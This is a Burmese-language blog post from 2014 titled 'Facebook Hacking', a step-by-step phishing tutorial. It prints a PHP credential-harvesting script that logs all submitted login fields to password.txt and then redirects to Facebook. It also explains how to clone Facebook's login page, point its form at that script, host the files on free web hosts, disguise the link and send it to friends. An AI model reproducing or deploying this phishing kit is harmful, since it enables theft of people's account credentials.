ကြ်န္ေတာ့္ ဘေလာ့ေလးတြင္ တျခားေသာ နညး္ပညာ ဆိုဒ္မ်ားမွ ပို႕စ္မ်ားအား ကူးယူေဖၚျပျခင္းျဖစ္ပါေသာေၾကာင့္ ပို႕စ္ပိုင္ရွင္မ်ား ေရာက္ရွိလာသည္ရွိေသာ္ အျပစ္ေတာ္မယူပဲ နည္းပညာ မွ်ေ၀သည့္အေနျဖင့္ ျဖန္႕ေ၀ျခင္းျဖစ္ပါေသာေၾကာင့္ ခြင့္လႊတ္နားလည္ေပးၾကပါရန္

Sunday, August 31, 2014

Facebook Hacking

အဆင့္(၁)
ပထမဆံုး notepad ကိုဖြင့္လိုက္ပါ...။
ၿပီးရင္ေအာက္မွာကၽြန္ေတာ္ေရးထားတဲ့ ေကာင္ေလးေတြကို ရိုက္ထည့္လိုက္ပါ..။

header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
ရၿပီေနာ္ ရရင္ အဲဒီ ေကာင္ကို phishing.php ဆိုၿပီး Save ထားလိုက္ဗ်ာ...။

 


အဆင့္(၂)
ၿပီးေတာ့ကၽြန္ေတာ္တို႔ လိုသူငယ္ႏွပ္စား ေလးေတြလုပ္ေနက်အတိုင္း Facebook ရဲ႕ Log in page ကိုသြား
လိုက္ပါ..။ၿပီးရင္ Right Click ေထာက္..။View Page Source ကို သြား ..။ေပၚလာရင္ အားလံုးကို Select All
ေပးၿပီး notepad အသစ္တစ္ခု ထဲ မွာ ကူးထည့္ေပးပါ..။
အဆင့္(၃)
ၿပီးရင္ အဲဒီထဲမွာ Ctrl+F ႏွိပ္ၿပီး action=* ကိုရွာေပးပါ...။ေတြ႔ရင္..။ဒီလိုျဖစ္မယ္ထင္တယ္...။
ဒီလိုျဖစ္မယ္..
action=''https://login.facebook.com/login.php?''
အဲဒီေနရာမွာ..
action=''phishing.php''
လုိ႔ အစားထုိးေပးပါ...။
ရမလား ခင္ဗ်ာ...။
အဆင့္(၄)
ၿပီးရင္ အဲဒီေကာင္ကို facebooklogin.htm/ လုိ႔ေဆ့လိုက္ပါခင္ဗ်ာ..။
အဆင့္(၅)
ၿပီးရင္ notepad ကိုထပ္ဖြင့္ၿပီး Text File အလြတ္တစ္ခုကိုဖန္တီးလိုက္ပါ...။နာမည္က password.txt
ျဖစ္ပါ့မယ္..။
ေနာက္ဆံုးအဆင့္ကေတာ့ အဲဒီ ဖုိင္(၃) ဖိုင္ကို Upload လုပ္မယ့္အဆင့္ပါပဲ...။ ကၽြန္ေတာ္တို႔ အေနနဲ႕
အဲဒီ ဖိုင္သံုးဖိုင္ကို Free web hosting Site တစ္ခုခု မွာ တင္ရပါမယ္...။ဥပမာဘယ္လိုဆိုက္ေတြလဲ
ဆိုရင္
http://www.110mb.com/ http://www.ripway.com/
အဲဒီလို ဆိုက္ေတြပဲျဖစ္ပါတယ္..။ကၽြန္ေတာ္တို႔ နဖူးေတြ႕ဒူးေတြ႕ႀကံဳလိုက္ရတဲ့..Chrome.exe ဟာဆိုရင္
လည္း Ripway က hosting ယူထားတာျဖစ္ပါတယ္...။
ကၽြန္ေတာ္နမူနာ ျပမယ္ဆိုရင္ ..upload တင္ၿပီးတာနဲ႕ သူရဲ႕ URL က ဒီအတိုင္းျဖစ္ပါမယ္..။
http://sitename.110mb.com/facebooklogin.html ျဖစ္ပါ့မယ္..။
ဥပမာ ကၽြန္ေတာ္က heinlinhtun နာမည္နဲ႕ Register လုပ္ထားရင္..
http://heinlinhtun.110mb.com/facebooklogin.html ျဖစ္ပါလိမ့္မယ္...။
ဒါကိုမွ မေက်နပ္ေသးဘူးဆိုရင္ auto redirection URL ထုတ္ေပးတဲ့ ဆိုက္ေတြအမ်ားႀကီးရွိပါတယ္..။
သြားၿပီး ဆင္တူရိုးမွား ပံုစံအတုမ်ားလည္း ျပဳလုပ္လုိ႔ရပါေသးတယ္..။(လုပ္ခုိင္းတာ မဟုတ္ဘူးေနာ္)
အဲဒါၿပီးရင္ေတာ့ အဲဒီ လင့္ခ္ကိုယူ သူငယ္ခ်င္းဆီကိုပို႔ ဟိုဘက္က Log in ၀င္တာနဲ႕...ကြိၿပီပဲေနာ္..။

No comments:

Post a Comment